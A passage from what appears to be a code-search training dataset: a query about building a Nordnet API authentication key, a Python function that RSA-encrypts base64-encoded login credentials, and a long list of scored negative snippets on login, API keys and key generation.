visited.append(smallest_connection.name)\n\n return self.prims_tree", "def get_configspace():\n cs = CS.ConfigurationSpace()\n\n \n\n # Learning rate hyperparameter\n lr = CSH.UniformFloatHyperparameter('lr', lower=1e-6, upper=1e-1, default_value='1e-2', log=True)\n\n \n\n # Stochastic gradient descent momentum as parameter.\n sgd_momentum = CSH.UniformFloatHyperparameter('sgd_momentum', lower=0.0, upper=0.99, default_value=0.9, log=False)\n\n cs.add_hyperparameters([lr, sgd_momentum])\n \n # Optimizer hyperparameters.\n #optimizer = CSH.CategoricalHyperparameter('optimizer', ['Adam', 'SGD'])\n #cs.add_hyperparameters([optimizer])\n \n # Only add the sgd_momentum hyperparameter if the optimizer is stochastic gradient descent. Otherwise, it doesn't make sense.\n #cond = CS.EqualsCondition(sgd_momentum, optimizer, 'SGD')\n #cs.add_condition(cond)\n\n ''' The below is commented out because we're not fiddling with architecture in this optimization.'''\n #num_new_fc_layers = CSH.UniformIntegerHyperparameter('num_new_fc_layers', lower=0, upper=3, default_value=0, log=False)\n #num_els_new_1 = CSH.UniformIntegerHyperparameter('num_els_new_1', lower=128, upper=4096, default_value = 1000, log=True)\n #num_els_new_2 = CSH.UniformIntegerHyperparameter('num_els_new_2', lower=128, upper=4096, default_value = 1000, log=True)\n #num_els_new_3 = CSH.UniformIntegerHyperparameter('num_els_new_3', lower=128, upper=4096, default_value = 1000, log=True)\n\n #freeze0_old = CSH.UniformIntegerHyperparameter('freeze0_cat', lower = 0, upper = 1, default_value = 1, log=False)\n #freeze1_old = CSH.UniformIntegerHyperparameter('freeze1_cat', lower=0, upper=1, default_value=1, log=False)\n\n #cs.add_hyperparameters([num_new_fc_layers, num_els_new_1, num_els_new_2, num_els_new_3, freeze0_old, freeze1_old, batchsize])\n\n dropout_rate = CSH.UniformFloatHyperparameter('dropout_rate', lower=0.0, upper=0.9, default_value=0.5, log=False)\n\n cs.add_hyperparameters([dropout_rate])\n\n return cs", "def suggest_config(parameters, trial):\n config = {}\n for c_name, c_type, c_vals in parameters:\n if c_type == \"choice\":\n config[c_name] = trial.suggest_categorical(c_name, c_vals)\n elif c_type == \"int\":\n config[c_name] = trial.suggest_int(c_name, c_vals[0], c_vals[1], step=c_vals[2] if len(c_vals) > 2 else 1, log=c_vals[3] if len(c_vals) > 3 else False) \n elif c_type == \"float\":\n config[c_name] = trial.suggest_float(c_name, c_vals[0], c_vals[1], step=c_vals[2] if len(c_vals) > 2 else 1, log=c_vals[3] if len(c_vals) > 3 else False) \n elif c_type == \"fixed\":\n config[c_name] = c_vals\n else:\n raise ValueError(\"Parameter type '%s' was not implemented!\" % c_type)\n return config" ]
[ "0.7005242", "0.66232514", "0.6464399", "0.62459195", "0.6219636", "0.6025062", "0.5821818", "0.58028185", "0.56950855", "0.5568496", "0.5530859", "0.5526991", "0.55262834", "0.5522291", "0.547059", "0.5425894", "0.54113275", "0.5394614", "0.5392455", "0.5378019", "0.53733134", "0.5367146", "0.5268899", "0.52353597", "0.5216201", "0.52160203", "0.5210259", "0.5201441", "0.5195899", "0.51886064", "0.51710504", "0.51304", "0.5119616", "0.5107861", "0.5101871", "0.50957566", "0.5090436", "0.50832576", "0.5072423", "0.507175", "0.507079", "0.50623393", "0.5043957", "0.5043856", "0.50409037", "0.50383687", "0.5002119", "0.49989375", "0.4985671", "0.49664885", "0.49662915", "0.4961965", "0.49543333", "0.49430555", "0.49389988", "0.49284124", "0.49264443", "0.49233118", "0.49121568", "0.49091417", "0.48973858", "0.4897369", "0.48909193", "0.48890173", "0.48885465", "0.48881823", "0.48860124", "0.4884193", "0.48810285", "0.48729274", "0.4871689", "0.4870553", "0.48677617", "0.48673135", "0.48608696", "0.48587158", "0.4855237", "0.4853168", "0.48507416", "0.48494846", "0.48430482", "0.48421738", "0.48399064", "0.4839358", "0.48371452", "0.48363057", "0.48342818", "0.48320743", "0.48303333", "0.48291057", "0.48240927", "0.48177618", "0.48114377", "0.48093864", "0.4807966", "0.48071584", "0.4804086", "0.47986066", "0.47914287", "0.47861388" ]
0.71698874
0
Makes the key for authentication according to the specification on Nordnets page
def make_hash(self): timestamp = str(int(round(time.time()*1000))) auth = b64encode(config.username) + ':' \ + b64encode(config.password) + ':' \ + b64encode(timestamp) rsa = RSA.load_pub_key(config.public_key) encrypted_auth = rsa.public_encrypt(auth, RSA.pkcs1_padding) key = b64encode(encrypted_auth) return key
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_key ():", "def private_key(self):", "def public_key(self):", "def private_key():\n return \"Toholampi summer festival 2017 has the most harcore rock bands\"", "def authenticator():", "def getAuthKey(self):\r\n auth_key = 'Que despierte la Red'\r\n assert len(auth_key) == self.AUTH_KEY_LEN\r\n return auth_key", "def _get_auth_string(self):", "def load_key():", "def authenticate(self,keys=None):\n\n # if we have just been handed keys, stash them in self\n if keys:\n self.appID = keys['appID']\n self.mac_key_id = keys['mac_key_id']\n self.mac_key = keys['mac_key']\n debugMain('authenticate: ok, thanks for supplying keys')\n return keys\n\n # if we already have keys, we don't need to do anything.\n if self.isAuthenticated():\n debugMain('authenticate: we already have keys! doing nothing.')\n return\n\n # first, register with the server to get temp keys:\n # self.appID and self.mac_*\n # this also makes a new self.session which uses MAC authentication\n self._register()\n\n debugMain('authenticate: converting temp keys into permanent keys')\n\n # send user to the tent.is url to grant access\n # we will get the \"code\" in response\n self.state = randomString()\n params = {\n 'client_id': self.appID,\n 'redirect_uri': self.oauthCallbackUrl,\n 'state': self.state,\n 'scope': ','.join(self.scopes.keys()),\n 'tent_profile_info_types': 'all',\n 'tent_post_types': 'all',\n }\n if self.postNotificationUrl:\n params['tent_notification_url'] = self.postNotificationUrl\n requestUrl = self.apiRootUrls[0] + '/oauth/authorize'\n urlWithParams = requestUrl + '?' + urlencode(params)\n\n print '---------------------------------------------------------\\\\'\n print\n print 'Opening web browser so you can grant access on your tent server.'\n print\n print 'URL: %s'%urlWithParams\n print\n print 'After you grant access, your browser will be redirected to'\n print 'a nonexistant page. Look in the url and find the \"code\"'\n print 'parameter. Paste it here:'\n print\n print 'Example:'\n print 'http://zzzzexample.com/oauthcallback?code=15673b7718651a4dd53dc7defc88759e&state=ahyKV...'\n print ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n print\n webbrowser.open(urlWithParams)\n code = raw_input('> ')\n print\n print '---------------------------------------------------------/'\n\n # trade the code for a permanent key\n # first make the auth headers using the credentials from the registration step\n resource = '/apps/%s/authorizations'%self.appID\n jsonPayload = {'code':code, 'token_type':'mac'}\n\n # then construct and send the request\n debugDetail()\n headers = dict(DEFAULT_HEADERS)\n headers['Content-Type'] = 'application/vnd.tent.v0+json'\n requestUrl = self.apiRootUrls[0] + resource\n debugRequest('posting to: %s'%requestUrl)\n r = retry(self.session.post, requestUrl, data=json.dumps(jsonPayload), headers=headers)\n\n # display our request\n debugDetail('request headers:')\n debugJson(r.request.headers)\n debugDetail('request data:')\n debugDetail(r.request.data)\n\n # then get the response\n debugDetail()\n debugDetail('response headers:')\n debugJson(r.headers)\n debugDetail('response text:')\n debugRaw(r.text)\n if not r.json:\n debugDetail()\n debugError('auth failed.')\n return\n debugJson(r.json)\n\n # now we have permanent keys\n self.mac_key_id = r.json['access_token'].encode('utf-8')\n self.mac_key = r.json['mac_key'].encode('utf-8')\n debugDetail('final mac key id: %s'%self.mac_key_id)\n debugDetail('final mac key: %s'%self.mac_key)\n\n # return the keys\n return {\n 'appID': self.appID,\n 'mac_key_id': self.mac_key_id,\n 'mac_key': self.mac_key,\n }", "def key():", "def _GetKeyString(self):", "def _GetKeyString(self):", "def __init__(self, key):\r\n self._key = key\r\n self._authenticated = Deferred()", "def getAuthKey( self ):\n d = {\n \"frob\" : FLICKR[ \"frob\" ],\n \"perms\" : \"delete\"\n }\n sig = self.signCall( d )\n url = self.urlGen( api.auth, d, sig )\n ans = \"\"\n try:\n webbrowser.open( url )\n print(\"Copy-paste following URL into a web browser and follow instructions:\")\n print(url)\n ans = raw_input(\"Have you authenticated this application? (Y/N): \")\n except:\n print(str(sys.exc_info()))\n if ( ans.lower() == \"n\" ):\n print(\"You need to allow this program to access your Flickr site.\")\n print(\"Copy-paste following URL into a web browser and follow instructions:\")\n print(url)\n print(\"After you have allowed access restart uploadr.py\")\n sys.exit()", "def __init__(self, basekey=\"\"):\n self.basekey = basekey", "def main():\n key, plain = get_key_plain()\n encode(key, plain)", "def test_create_digital_access_key(self):\n pass", "def test_create_api_key(self):\n pass", "def auth_token(self):", "def pass_key(self) -> str:\n return pulumi.get(self, \"pass_key\")", "def download_key():\n data = check_args(('cloudProvider', ))\n provider = jobs.init_provider(data, True)\n key = encrypt_key(provider.get_key(), data['username'])\n return make_response(keyName=provider.keyname, key=key)", "def authenticate(self):\n expires = int(time.time())\n method = \"GET\"\n path = \"/realtime\"\n msg = method + path + str(expires)\n signature = hmac.new(\n self.secret, msg.encode(), digestmod=hashlib.sha256\n ).hexdigest()\n\n req = {\"op\": \"authKey\", \"args\": [self.key, expires, signature]}\n self.send_packet(req)", "def key():\n pass", "def key():\n pass", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def MakeKey(self, string, string_1, string_2):\n ...", "async def gen_auth_string():\n return f\"{ASTERISK_USER}:{ASTERISK_PASS}\"", "def generate_key(self):\n\n self.key = Fernet.generate_key()\n self.cryptor = Fernet(self.key)", "def __init__(self, key, initial_prng):\n self.cipher = key\n self.prng = initial_prng\n self.nonce = None", "def generate_access_key(self):\n\t\tfrom app import app\n\t\ts = JSONWebSignatureSerializer(app.config['SECRET_KEY'])\n\t\taccess_key = s.dumps({'username': self.username}) \n\t\tself.access_key = access_key", "def keygen():\n pk, pub = generate_signing_key()\n t = PrettyTable([\"Private (install on your witness node)\",\n \"Public (publish with 'conductor enable' command)\"])\n t.align = \"l\"\n t.add_row([pk, pub])\n\n output(t, '')", "def set_AuthenticationKey(self, value):\n super(AddressValidationInputSet, self)._set_input('AuthenticationKey', value)", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def set_key(vars): #vars=[0]num,[1]rWord,[2]rString\r\n nonlocal key\r\n nonlocal x\r\n x=vars[0]\r\n if (vars[1]=='yes'):\r\n key['reverse_word']=True\r\n if (vars[2]=='yes'):\r\n key['reverse_string']=True\r\n if (x<-26 or x>26):\r\n x=x%26 #makes x to be in range\r\n if (x==0):\r\n x=random.randrange(-26,26) #random number\r\n for i in range (97,123): #26 ABC letters, ASCII value of 'a' is 97 97+26=123\r\n if(i+x>122):\r\n key[chr(i)]=chr(i-25+x)\r\n elif (i+x<97):\r\n key[chr(i)]=chr(i+26+x)\r\n else:\r\n key[chr(i)]=chr(i+x)\r\n print(\"done\")", "def get_key(self, user, api_key):\n return True", "def ns_authentication(conn):\n # get RSA key of Bob for decrypting\n rsa_key = rsa.import_key(\"RsaKey.asc\")\n\n # A -- {N_A, A}(K_PB) --> B\n request = rsa.decrypt(rsa_key, conn.recv(1024))\n client_nonce, client_name = request.split(',')\n print(\"Bob: recieved nonce {} from client {}\".format(client_nonce, client_name))\n\n # get client's public key\n subprocess.Popen([sys.executable, \"..\\\\pks\\\\pks.py\", \"--extract\"])\n pks_address = (PKS_HOST, PKS_PORT)\n client_pkey = ns.get_public_key(pks_address, client_name, NAME, rsa_key)\n client_pkey = rsa.import_key(client_pkey)\n\n # Lowe's fix: A <-- {N_A, N_B, B} -- B\n bob_nonce = ns.generate_nonce()\n response = \"{},{},{}\".format(client_nonce, bob_nonce, NAME)\n response = rsa.encrypt(client_pkey, response)\n conn.sendall(response)\n print(\"Bob: sent nonces {}, {} to {}\".format(client_nonce, bob_nonce, client_name))\n\n # A -- {K, N_B} --> B\n request = conn.recv(1024)\n if request.isdigit() and int(request) == RESP_DENIED:\n return print(\"Bob: request to shutdown recieved, shutting down...\")\n request = rsa.decrypt(rsa_key, request)\n ssn_key, bob_resp_nonce = request.split(',')\n ssn_key = bytes(ssn_key, \"utf-8\")\n bob_resp_nonce = int(bob_resp_nonce)\n print(\"Bob: recieved session key {} and nonce {}\".format(ssn_key, bob_resp_nonce))\n\n # check if client did actually recieve Bob's nonce\n if bob_resp_nonce == bob_nonce:\n response = bytes(str(RESP_VERIFIED), \"utf-8\")\n conn.sendall(response)\n print(\"Bob: connection verified!\")\n return ssn_key, client_name\n else:\n print(\"Bob: nonces {} and {} do not match!\".format(bob_nonce, bob_resp_nonce))", "def authenticate( self ):\n\n print(\"Getting new token\")\n self.getFrob()\n self.getAuthKey()\n self.getToken()\n self.cacheToken()", "def key(key):\n return key", "def auth():\n pass", "def auth():\n pass", "def ask_keys(self, update, context):\r\n update.message.reply_text('Введите новый ключ')\r\n return self.LISTEN", "def __init__(self, server, key):\n self.server = server\n self.key = key", "def CR_authentication():\n \n # create a random 10 character string\n choices = string.letters + string.digits + string.punctuation;\n randomString = ''.join(random.choice(choices) for i in range(10))\n session['challenge'] = randomString\n \n return Response('Access failed.', 401, {'WWW-Authenticate': str.format('Basic realm=\\\"Protected iStreet event data; Challenge: {0}\\\"', randomString)})", "def recipient_public_key(self):", "def __init__(self, key_id: str, user: str, password: str):\n\n self.key_id = key_id\n self.user = user\n self.password = password\n self.con_strategy = \"unknown\"\n self.session = requests.Session()\n self.session.auth = (user, password)\n self.__fields = None\n if self.key_id == \"localhost\":\n self.local_ip_list = \"127.0.0.1\"\n self.local_ip = \"127.0.0.1\"\n self.port = \"52199\"\n self.con_strategy = \"local\"", "def gen_tlsauth_key():\n cmd = ['/usr/sbin/openvpn', '--genkey', 'secret', 'ta.tmp']\n ret = subprocess.check_call(cmd)\n with open('ta.tmp') as key:\n key = key.read()\n os.remove('ta.tmp')\n return key", "def __init__(self, key=None):\n\n self.key = key\n self.cryptor = None\n self.file_ext_targets = ['txt']", "def __init__(self, uid, key, initial_prng):\n self.uid = uid\n self.key = key\n Crypto1.__init__(self, key, initial_prng)", "def create_apikey(self, username, api_key):\r\n return 'ApiKey %s:%s' % (username, api_key)", "def genKeys():\r\n (pub, priv) = rsa.newkeys(256)\r\n context = {\r\n 'pub': pub,\r\n 'priv': priv\r\n }\r\n return context", "def API_KEY(self):\n return 13", "def auth(self):\n\n self.name = self.config[\"sname\"]\n self.numeric = self.config[\"numeric\"]\n\n passwd = self.config[\"password\"]\n\n now = int(time.time())\n\n self.send_line(\"PASS :%s\" % passwd)\n self.send_line(\"SERVER %s 1 %d %d J10 %s]]] 0 :Gravelir Services\" %\\\n (self.name, now, now, self.numeric))", "def __init__(self, accesskey):\n self.accesskey = accesskey\n self.UpdateFromServer()", "def get_request_authentication():\n return os.urandom(16)", "def add_key(mu_key):\n params['key'] = mu_key", "def api_key_set(self, api_key):\n self.request('/v1.1/auth_key', 'POST', body={'auth_key': api_key})", "def API_KEY(self):\n return 2", "def generate_keystream(self):", "def get_key_input():\n return get_input(message='Please enter your master key:',\n secure=True, check_timer=False)", "def generate_api_key(key_length: int = settings.api_app_auth_key_length) -> str:\n return secrets.token_urlsafe(64)[:key_length]", "def authenticate(self):\n # Receive public key from server\n message = self.receive()\n # Initialize RSA with public key of server\n self.secret.init_rsa(public_key=message)\n # Initialize AES\n self.secret.init_aes()\n # Encrypt AES key & nonce\n payload = self.secret.encrypt_rsa(self.secret.export_aes_key())\n # Send encrypted AES key & nonce pair to server\n self.send(payload)\n self.secret.ready = True", "def make_external_key(self, data):\n return data['key']", "def __init__(self):\n self._keypair = RSA.generate(2048)\n self.public_key = self._keypair.publickey().exportKey()", "def upload_key():\n data = check_args(('cloudProvider', 'key'))\n provider = jobs.init_provider(data, True)\n key = decrypt_key(data['key'], data['username'])\n provider.save_key(key)\n return make_response()", "def test_api_key(self):\n self.assertEqual(self.route4me.key, '11111111111111111111111111111111')", "def key_id(cls, url: str):\r\n ...", "def generate_key():\n return get_token_generator().generate_token()", "def _init_keys(self):\n\n basic_constraints = crypto.X509Extension('basicConstraints'.encode('ascii'), True,\n 'CA:TRUE, pathlen:0'.encode('ascii'))\n serial = self._get_serial()\n pkey = self._create_pkey(self.commonname, serial)\n self._create_cert(pkey, self.commonname, serial, [basic_constraints], expire=30*365)", "def newKeyGenerate():\n generate()\n return '', 204", "def setup_keys():\n if os.path.isfile(\"key.txt\"):\n message = \"Key already generated\"\n else:\n secret = secrets.token_urlsafe(64)\n message = \"Secret generated and saved in key.txt\"\n with open(\"key.txt\", \"w\") as fd:\n fd.write(secret)\n return json.dumps({'message': message})", "def gen_keys():", "def email_key(self):\r\n url = '{0}/emailKey/generate'.format(self.get_url())\r\n request = http.Request('POST', url)\r\n return request, parsers.parse_json", "def create_keys(self):\n crypto_tool = CryptoTools()\n # creating RSA keys for the signer user\n public_key, private_key = crypto_tool.create_key_with_entropy()\n self.priv_key = crypto_tool.get_pem_format(private_key).decode(\"utf-8\")\n self.pub_key = crypto_tool.get_pem_format(public_key).decode(\"utf-8\")", "def auth_key(event):\n headers = event.get('header')\n if not headers:\n raise RestException(\"Headers are missing\", 400)\n auth = headers.get('Authorization')\n if not auth:\n raise RestException('Header Authorization is missing', 400)\n if not auth.lower().startswith('bearer '):\n raise RestException(\"Authorization missing Bearer keyword\", 400)\n auth = auth.replace('Bearer ', '')\n auth = auth.replace('bearer ', '')\n return auth.strip()", "def gen_key():\n key = os.urandom(32) # 256 bit\n return base64.b64encode(key).rstrip('=') # strip off padding", "def __init__(self, cust_key):\n\n # Call the base class constructor to pass in the base URL\n super().__init__(base_url=\"https://s-platform.api.opendns.com/1.0\")\n\n # Store the API key for use as a query parameters later\n self.auth_params = {\"customerKey\": cust_key}", "def gen_api_key():\r\n m = hashlib.sha256()\r\n m.update(get_random_word(12))\r\n return unicode(m.hexdigest()[:12])", "def _get_api_key(self):\n self.api.apikey = self.api.action.user_show(id=self.username)['apikey']", "def get_auth(self):\n return {'method': yeti_config.core.auth}", "def __init__(self, key):\n self.key = key", "def gen_key(app):\n\tos.system('lxc-attach -n %s -- ssh-keygen -t rsa -N \"\" -f key' % app)", "def generate_keys(self):\n\n # TODO: Store keys encrypted\n rsa1 = RsaPrivateKey.Generate()\n self.sign_private = str(rsa1)\n self.sign_public = str(rsa1.public_key)\n\n rsa2 = RsaPrivateKey.Generate()\n self.crypt_private = str(rsa2)\n self.crypt_public = str(rsa2.public_key)", "def get_key_id(self):", "def __init__(self, alg, key):\n self.alg = alg\n self.key = key", "def _set_authenticator(self):\n pass", "def test_aws_service_api_keypair_generate_post(self):\n pass", "def _newKey(self, key):\n pass", "def request_idkey(self):\r\n if self.use_http():\r\n self.enqueue_http_request(\"money/idkey\", {}, \"idkey\")\r\n else:\r\n self.send_signed_call(\"private/idkey\", {}, \"idkey\")", "def api_key(request):\r\n user_acct = request.user\r\n return _api_response(request, {\r\n 'api_key': user_acct.api_key,\r\n 'username': user_acct.username\r\n })", "def set_tokenterminal_key(\n key: str, persist: bool = False, show_output: bool = False\n) -> str:\n handle_credential(\"API_TOKEN_TERMINAL_KEY\", key, persist)\n return check_tokenterminal_key(show_output)", "def accesskey(request):\n return request.config.getoption(\"--accesskey\")", "def __init__(self, key):\n self._key = key\n self.log = logging.getLogger(__name__)\n self.base_url = \"https://osu.ppy.sh/api/{}?k=\" + self._key", "def _authenticate(self):\n\t\tfrom getpass import getpass\n\t\tpassword = getpass()\n\t\tself.msg('nickserv', 'identify %s' % password)", "def test_add_api_key_to_org(self):\n pass", "def model_endpoint():\n if request.method == 'POST':\n # Build a new Kiosk login\n data: object = {\"Name\": \"Fred\", \"authkey\": \"Im a base64 encoded authorization key\"}\n return jsonify(data.__dict__)\n else:\n return \"\"", "def start(self):\n self.delay(50)\n DEBUG = GLOBAL_DEBUG and True\n if DEBUG: print \"start()\"\n\n # Get enckey_idx\n enckey_idx = struct.unpack(\"<L\", self.magic_page[OFF_ENCKEY_IDX:OFF_ENCKEY_IDX+4])[0]\n enckey_idx_actual = ((enckey_idx % SZ_PAGE) & ~0xF) & 0xFFFFFFFF;\n if DEBUG: print \"enckey_idx = 0x%08x; enckey_idx_actual = 0x%08x\" % (enckey_idx, enckey_idx_actual)\n\n # Get the enckey: a 4-lengthed array of uint32_ts\n self.state[\"enckey\"] = self.magic_page[enckey_idx_actual:enckey_idx_actual+16]\n # NOTE: this doesn't take LE into account\n if DEBUG: \n print \"enckey_idx_actual = 0x%02x, enckey = %s\" % (enckey_idx_actual, self.state[\"enckey\"])\n msg = \"0x\"\n for byte in self.state[\"enckey\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print \"enckey (hex) = %s\" % msg\n\n # Get auth_token_idx\n auth_token_idx = struct.unpack(\"<L\", self.magic_page[OFF_AUTH_TOKEN_IDX:OFF_AUTH_TOKEN_IDX+4])[0]\n auth_token_idx_actual = ((auth_token_idx % SZ_PAGE) & ~0xF) & 0xFFFFFFFF;\n if DEBUG: print \"auth_token_idx = 0x%08x; auth_token_idx_actual = 0x%08x\" % (auth_token_idx, auth_token_idx_actual)\n\n # Get the auth_token: a single uin32_t\n self.state[\"auth_token\"] = self.magic_page[auth_token_idx_actual:auth_token_idx_actual+4]\n # NOTE: this doesn't take LE into account\n if DEBUG: \n print \"auth_token_idx_actual = 0x%02x, auth_token = %s\" % (auth_token_idx_actual, self.state[\"auth_token\"])\n msg = \"0x\"\n for byte in self.state[\"auth_token\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print \"auth_token (hex) = %s\" % msg\n\n # Initialize PRNG buf (static)\n self.state[\"prng_buf\"] = struct.pack(\"<BBBBBBBB\", \n 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77 );\n if DEBUG: \n print 'self.state[\"prng_buf\"] = %s' % self.state[\"prng_buf\"] \n msg = \"0x\"\n for byte in self.state[\"prng_buf\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print 'self.state[\"prng_buf\"] = %s' % msg\n \n # Get PRNG key (based on flag page)\n self.state[\"prng_key\"] = \"\".join([ \n self.magic_page[ 2], self.magic_page[ 3], \n self.magic_page[ 5], self.magic_page[ 7],\n self.magic_page[11], self.magic_page[13],\n self.magic_page[17], self.magic_page[19],\n self.magic_page[23], self.magic_page[29],\n self.magic_page[31], self.magic_page[37],\n self.magic_page[41], self.magic_page[43],\n self.magic_page[53], self.magic_page[59] ] )\n if DEBUG: \n print 'self.state[\"prng_key\"] = %s' % self.state[\"prng_key\"] \n msg = \"0x\"\n for byte in self.state[\"prng_key\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print 'self.state[\"prng_key\"] = %s' % msg\n\n # We start with an empty PRNG cache.\n self.state[\"prng_bytes_remaining\"] = 0\n\n # Toggle for expected destination of messages.\n self.state[\"expected_dst\"] = DST_CB1", "def _create_fernet_key(self) -> str:\n\n client = boto3.client(\"ssm\", endpoint_url=os.environ.get(\"AWS_ENDPOINT\"))\n\n try:\n response = client.get_parameter(Name=self.object_name, WithDecryption=True)\n return response[\"Parameter\"][\"Value\"]\n except client.exceptions.ParameterNotFound:\n return Fernet.generate_key().decode()", "def __init__ (self, key = None, password = None):\n self.KEY = key or 'testapi'\n self.PASSWORD = password or 'testpass'\n self.URL = 'https://api.internet.bs/'\n # assume we use test credential if none were provided\n if not key or not password:\n self.URL = 'https://testapi.internet.bs'", "def API_KEY(self):\n raise NotImplementedError()", "def GetRootKey(self):", "def genKey(self, otherKey):\n self.sharedSecret = self.genSecret(self.privateKey, otherKey)\n #print(\"Shared secret:\")\n #print(self.sharedSecret)\n s = hashlib.sha256()\n s.update(bytes(str(self.sharedSecret).encode()))\n self.key = s.digest()" ]
[ "0.7266466", "0.6840144", "0.6624", "0.6536083", "0.6467815", "0.6440537", "0.6359403", "0.63546956", "0.63519514", "0.6313089", "0.62246615", "0.62246615", "0.6169524", "0.61688346", "0.6131176", "0.6095102", "0.60891443", "0.6085557", "0.60689396", "0.6060211", "0.6033049", "0.60202295", "0.59597", "0.59597", "0.5957856", "0.5947271", "0.5934865", "0.59346384", "0.593023", "0.5924253", "0.59170914", "0.59007305", "0.58993864", "0.58900386", "0.5887282", "0.5884582", "0.5873373", "0.5865987", "0.5858835", "0.5858835", "0.58443666", "0.58439845", "0.5838156", "0.5831107", "0.582528", "0.58227783", "0.5818972", "0.58123344", "0.5811503", "0.58009887", "0.58004314", "0.5796635", "0.57945675", "0.5782812", "0.57826185", "0.5742677", "0.57378775", "0.57325196", "0.5731513", "0.573102", "0.57172424", "0.57153606", "0.5714085", "0.571194", "0.5706188", "0.570538", "0.5704514", "0.57032543", "0.56942946", "0.5678398", "0.56756985", "0.56731427", "0.56699795", "0.5667769", "0.56654006", "0.56596035", "0.56571704", "0.5655939", "0.5650857", "0.5649768", "0.5647129", "0.5646106", "0.5643047", "0.5641333", "0.5639338", "0.5639149", "0.5633051", "0.5627434", "0.5626373", "0.5623863", "0.5622707", "0.56180483", "0.5609221", "0.5608564", "0.5603263", "0.5602235", "0.5600122", "0.5595563", "0.5595205", "0.5593619", "0.55871433" ]
0.0
-1
Logs in to the server
def login(self): hashkey = self.make_hash() connection = self.connection or self.connect() parameters = urlencode({ 'service' : config.service, 'auth' : hashkey }) print "parameters for login: '%s'" % (parameters) connectionstring = 'https://' + config.base_url + '/' \ + config.api_version + '/login' logger.info('Trying to login to REST: %s' % connectionstring) logger.info('Applying header: %s' % no_auth_headers) connection.request('POST', connectionstring, parameters, no_auth_headers) response = connection.getresponse() response_as_json = jloads(response.read()) self.auth_session_key = response_as_json['session_key'] self.auth_hostname = response_as_json['public_feed']['hostname'] self.auth_port = response_as_json['public_feed']['port'] basic_auth = b64encode("%s:%s" % (self.auth_session_key, self.auth_session_key)) self.auth_headers = no_auth_headers.copy() self.auth_headers['Authorization']="Basic %s" % (basic_auth) return response_as_json
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def login(self):\n\t\treturn", "def login():", "def login():", "def login(self):\n self.client.login(username=self.user.username, password='test')", "def login_user(self):\r\n self.client.login(username=self.user.username, password=\"password\")", "def login(self):\n\n self.__login_if_required()", "def login(self):", "def einloggen(self):\n \n self.c.login(self.username.text(), self.password.text(), \"1\")", "def login(self):\n r = self._login_token()", "def _login(self, *args, **kwargs):\n pass", "def log_in(self):\n\t\tpass", "def login(self):\n url = self.base_url + self.logon_url\n payload = {'username_or_email': self.user, 'password': self.passwd}\n try:\n resp = requests.post(url, headers=self.headers, data=json.dumps(payload), timeout=30, verify=False)\n print(resp.text)\n if resp.ok:\n self.headers.update(json.loads(resp.text)[\"session_id\"])\n print('hit login print')\n else:\n print('Could not login to {url} -->{}'.format(resp.text))\n return resp\n\n except requests.exceptions.ConnectionError:\n print('Connection Timed out --> {}'.format(url))", "def doLogin(self):\n\t\tlogin_data = urllib.urlencode({\n\t\t\t'operatorName' : self.username,\n\t\t\t'password' : self.password,\n\t\t\t'submit' : 'Iniciar+sesi%C3%B3n',\n\t\t})\n\n\t\tresponse = self.opener.open(\"http://172.16.0.2/tdserver/login_deal.jsp\", login_data)\t\t### deberia devolver verdadero o falso segun se logueo o no", "def login():\n pass", "def log_in(self):\n\n # Get login page.\n self.get_endpoint(endpoint=self.config['paths']['login'])\n\n # Post log-in data.\n email_form = self.browser.find_element_by_xpath(\"//input[@id='email']\")\n pw_form = self.browser.find_element_by_xpath(\"//input[@id='password']\")\n email_form.send_keys(self.credentials['email'])\n pw_form.send_keys(self.credentials['password'])\n\n # Initial log-in returns /private endpoint.\n self.browser.find_element_by_xpath(\"//input[@type='submit']\").click()", "def log_in(self):\n print('-=' * 12 + \" Log in \" + '-=' * 12)\n mob_num, password = self._input_mob_num('Mobile Number :'), input(\"Password: \")\n self._user = self.auth.log_in(mob_num, password)\n if self._user:\n print(\"you are logged in, Welcome '{}'\".format(self._user.username))\n self.homepage()\n else:\n print(\"Mobile number or/and password is/are Invaild \\n\" + '-=' * 30)\n options = {1: self.log_in, 2: self.logging_page, 3: self.exit}\n print_out = \"(1) Try Again \\n (2) Back to Logging Page \\n (3) Exit\"\n self._take_option(options, print_out)", "def login(self):\n url = 'https://ngb.to/login.php?do=login'\n\n params = {'do': 'login'}\n payload = {'vb_login_username': self.username,\n 'vb_login_password': self.password,\n 'url': \"index.php\",\n 'do': \"login\",\n 'vb_login_md5password': \"\",\n 'vb_login_md5password_utf': \"\",\n 's': \"\",\n 'securitytoken': \"guest\",\n 'cookieuser': \"1\"}\n\n self.session.post(url, data=payload, params=params)", "def login(self):\n self._client.clear_credentials()\n self._client.get('/v1/whoami')", "def login(self):\n self.session = requests.session()\n\n # Lie about the user agent because Lisa Zepto doesn't work without it.\n self.session.headers[\"User-Agent\"] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\"\n\n loginPayload = {\"admin_user\" : self.config.Username, \"admin_password\" : self.config.Password}\n loginResult = self.session.post(self.loginURL, data=loginPayload)\n\n if loginResult.status_code != 200:\n raise ConnectionError(\"Unable to login.\")", "def login(self, user=None, password=None):\n self._server.session_login(user=user, passwd=password)", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def login(self):\n self.open(base_url + '/login')\n self.type(\"#email\", test_user.email)\n self.type(\"#password\", test_user.password)\n self.click('input[type=\"submit\"]')", "def _login(self):\n data = self._send(self.nc_request(action=\"login\", parameters={\"apipassword\": self._api_password}))\n\n self._session_id = data[\"apisessionid\"]\n\n logging.info(f\"logged in successfully with session id {self._session_id}\")", "def _login(self):\n url = self.server_url + '/api/v4/users/login'\n login_data = json.dumps({'login_id': self._user_id,\n 'password': self._user_pass})\n 